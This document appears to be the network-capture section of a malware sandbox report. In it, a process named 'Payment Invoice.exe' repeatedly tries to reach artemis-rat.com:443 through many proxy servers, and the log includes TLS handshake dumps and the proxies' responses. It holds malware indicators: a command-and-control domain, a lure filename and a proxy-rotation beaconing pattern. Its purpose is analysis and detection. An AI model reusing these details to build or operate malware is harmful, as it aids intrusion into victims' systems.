                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.282202005 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:21.324714899 CET209OUTData Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ef 20 07 ea 6f 0b e5 bd 2a 3d 39 1a fb 71 18 c7 b8 26 48 ce c1 19 ba ea 29 51 6e b2 c8 26 6f 20 65 47 41 8b 6a f1 43 94 2f 7e 2a bf 41 8a 6e 54 6f a5 17 6b 53 f8 a0 99 3b ef a3 0d 42 e1 fd db 00 2a c0 2c c0 2b
                                                                Data Ascii: e o*=9q&H)Qn&o eGAjC/~*AnTokS;B*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:21.980056047 CET209OUTData Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ef 20 07 ea 6f 0b e5 bd 2a 3d 39 1a fb 71 18 c7 b8 26 48 ce c1 19 ba ea 29 51 6e b2 c8 26 6f 20 65 47 41 8b 6a f1 43 94 2f 7e 2a bf 41 8a 6e 54 6f a5 17 6b 53 f8 a0 99 3b ef a3 0d 42 e1 fd db 00 2a c0 2c c0 2b
                                                                Data Ascii: e o*=9q&H)Qn&o eGAjC/~*AnTokS;B*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:22.026752949 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:22.248292923 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 84 72 7a 9b 78 d2 21 f0 5b 53 f6 57 9d d2 9e 25 aa 69 45 8a 86 00 dd 4f 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9rzx![SW%iEODOWNGRD0000*H010Uartemis-rat.com0240311150855Z260311150855Z010Uartemis-rat.com0"0*H0mNfd:jEq
                                                                Mar 11, 2024 16:15:23.460362911 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ad 38 09 9a 1c 3d d0 9d 31 d3 38 6d a9 08 b4 0f 76 88 a4 4c f5 7e 02 52 41 48 dd 54 c1 84 95 6f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 81 28 f8 85 81 0a 45 8d 17 12 69 ee e9 00 7d cb 14 5e b1 95 f7
                                                                Data Ascii: %! 8=18mvL~RAHTo((Ei}^&@Q
                                                                Mar 11, 2024 16:15:23.725987911 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 58 c8 52 7f 67 8c 31 ce 3c 9d 3d 47 72 3a 26 c7 f3 3d 57 f7 49 b3 83 27 d9 81 74 a6 6a c0 a6 d4 22 78 81 e1 d6 6d df 57
                                                                Data Ascii: (XRg1<=Gr:&=WI'tj"xmW
                                                                Mar 11, 2024 16:15:24.522708893 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 58 c8 52 7f 67 8c 31 ce 3c 9d 3d 47 72 3a 26 c7 f3 3d 57 f7 49 b3 83 27 d9 81 74 a6 6a c0 a6 d4 22 78 81 e1 d6 6d df 57
                                                                Data Ascii: (XRg1<=Gr:&=WI'tj"xmW


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1445192.168.2.454213103.163.51.254807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.015630007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.455526114 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1446192.168.2.45439018.135.133.116807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.015908957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.311639071 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:21.327786922 CET209OUTData Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ef 20 07 e4 ba ce 56 05 15 b2 36 f4 f3 ae 95 18 f4 3d 84 e5 10 b8 e6 8f fa cb be ea 38 4f d6 20 65 47 41 8b 6a f1 43 94 2f 7e 2a bf 41 8a 6e 54 6f a5 17 6b 53 f8 a0 99 3b ef a3 0d 42 e1 fd db 00 2a c0 2c c0 2b
                                                                Data Ascii: e V6=8O eGAjC/~*AnTokS;B*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:21.625400066 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 8f 39 7f 65 f8 81 fa 2c 83 01 c5 15 6d 4a 3c e9 34 29 a8 89 be 3a a7 9c 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =99e,mJ<4):DOWNGRD0000*H010Uartemis-rat.com0240311142236Z260311142236Z010Uartemis-rat.com0"0*H09RK
                                                                Mar 11, 2024 16:15:21.775964975 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b6 bb 4d ec f5 2d 90 82 d6 85 19 af 55 f3 0c ed 0c 5f 93 7e 96 b8 62 36 6d 92 c0 72 21 f0 ea 6f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 75 df c4 17 ae 59 7e 76 a6 09 11 d7 e8 8d c3 68 07 fa 7a bb 34
                                                                Data Ascii: %! M-U_~b6mr!o(uY~vhz4!TY
                                                                Mar 11, 2024 16:15:22.067950010 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 c7 b1 b3 f6 0f 2e ca b4 d8 ff 26 d8 66 6c db 9b 97 7e ac 14 40 3b 28 f9 7e b9 99 38 e4 4f c4 80 bb 64 fc dc 46 a0 33 e3
                                                                Data Ascii: (.&fl~@;(~8OdF3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1447192.168.2.454360216.9.224.113807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.018069983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.376583099 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1448192.168.2.45438518.185.169.15031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.019547939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.325292110 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1449192.168.2.45373667.43.236.22130877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.020091057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.607654095 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1450192.168.2.45353934.93.157.8785147076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.020670891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.123280048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.214735985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.324317932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.323586941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.323590040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.323661089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:33.323806047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:21.339314938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1451192.168.2.45423190.188.250.16807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.085205078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1452192.168.2.454402147.75.34.86100087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.086777925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.391061068 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1453192.168.2.454361185.101.16.52807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.087726116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1454192.168.2.454448133.18.234.13807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.087728977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.366796970 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                Content-Type: text/html
                                                                Connection: close
                                                                Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                Data Ascii: Backend not available


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1455192.168.2.453320142.54.235.941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.087809086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1456192.168.2.45440394.130.94.45807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.087853909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1457192.168.2.45440949.13.131.163807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.087930918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1458192.168.2.45426245.124.184.13807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.088093042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1459192.168.2.45439820.206.106.19281237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.088099957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.891057014 CET319INHTTP/1.1 403 Forbidden
                                                                Server: squid
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:24 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 17
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                X-Cache: MISS from cdn-fintech.info
                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                Connection: keep-alive
                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1460192.168.2.45452135.190.107.16300007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.088365078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1461192.168.2.453626189.240.60.16890907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.088427067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.358521938 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1462192.168.2.45444647.243.92.19931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.088496923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.402050018 CET38INHTTP/1.1 200 OK
                                                                content-length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1463192.168.2.45446246.17.63.166100007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.088520050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.393224001 CET339INHTTP/1.1 403 Forbidden
                                                                Server: squid/4.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 5
                                                                X-Squid-Error: TCP_RESET 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from proxy.wakoopa.com
                                                                Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                Connection: keep-alive
                                                                Data Raw: 72 65 73 65 74
                                                                Data Ascii: reset


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1464192.168.2.45446758.234.116.19781937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.089724064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1465192.168.2.45448892.205.110.118265707076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.089761972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.873637915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.886627913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777133942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683314085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.478442907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.339499950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.886132002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.089245081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1466192.168.2.45448161.111.38.5807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.090171099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.399065018 CET507INHTTP/1.1 502 Proxy Error
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: Apache
                                                                Content-Length: 341
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
